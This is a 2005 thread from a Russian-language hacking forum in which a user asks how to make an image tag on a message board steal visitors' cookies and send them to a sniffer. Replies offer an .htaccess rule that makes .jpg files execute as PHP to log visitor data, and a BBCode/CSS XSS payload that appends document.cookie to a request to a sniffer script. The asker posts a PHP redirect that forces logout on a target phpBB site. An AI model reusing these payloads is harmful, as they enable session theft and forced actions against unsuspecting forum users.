Вопрос по php

Discussion in 'Песочница' started by Laggi, 4 Sep 2005.

  1. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Собственно не подскажет ли кто-нить php-код (в пхп я 0) при исполнении которого высылались бы на тот же сниффер античата кукизы?
    Это я все к уязвимости через , когда можно заставить юзверя айти на страничку и выполнить код. Что-нибудь безобидное - типа разлогинивания - легко.. А вот как сделать что-нибудь серьезное я не знаю...
    И вообще возможно ли это? ) Хотя я думаю, что возможно..
     
  2. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    хм... либо я тебя не понял, либо ты неправильно выразился. Какие кукизы тебе php должен выслать? или тебе код самого сниффире нужен?
     
    _________________________
  3. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    Никакая не уязвимость, например есть картинка которую смотрит юзер, в директории в которой есть данная картинка, там же лежит файл .htaccess с содержанием
    Code:
    AddType application/x-httpd-php .jpg
    смотря какое расширение у картинке,т.е. jpg файл обрабатывается как php. В самом файле например sniffer.jpg идёт пхп код, который содержит переменные окружения, а он в свою очередь отсылает их в log.
     
    _________________________
  4. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?
     
    _________________________
  5. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    [COLOR=[*IMG]http://aaa.aa/=`aaa.jpg[/*IMG]]` style=background:url(javascript:document.images[68].src="/cgi-bin/s.jpg?"+document.cookie) [/COLOR]
    типа что то этого ты имел ввиду?
    без зведочек естественно
     
  6. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Нет у я немного про другую уязвимость. Создаешь директорию /*.jpg . И тэгуешь ее в . В директории создаешь файл index.php - и он исполняется...
    [QUOTE]<?php
    header("Location: http://hosttobeexploited/phpBB/login.php?logout=true");
    exit;
    ?>[/QUOTE]
    Вот это как написано везде получается выполнять - разлогинивание. А вот как выполнить что-нить серьезное я хз.
     
  7. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Да. так тоже можно )
     
  8. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Собственно неважно каким способом, я бы хотел добиться эффекта как в XSSе предыдущем с тэгом . Загружается .jpg на страничке и п...на уровне пользователя не тяжело подсказать-с
     
  9. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Итак, кто-нить может помочь? если че моя ася 174621979
     
  10. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Ты че систему аутентификации чтоли делаешь?
     
  11. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,548
    Likes Received:
    1,397
    Reputations:
    612
    Все таки ты какал... а я предупреждал тебя... и не один раз... что нельзя тебе какать... эх...
    Laggi, ты конешно молодец... додумался хорошо, но это не работает...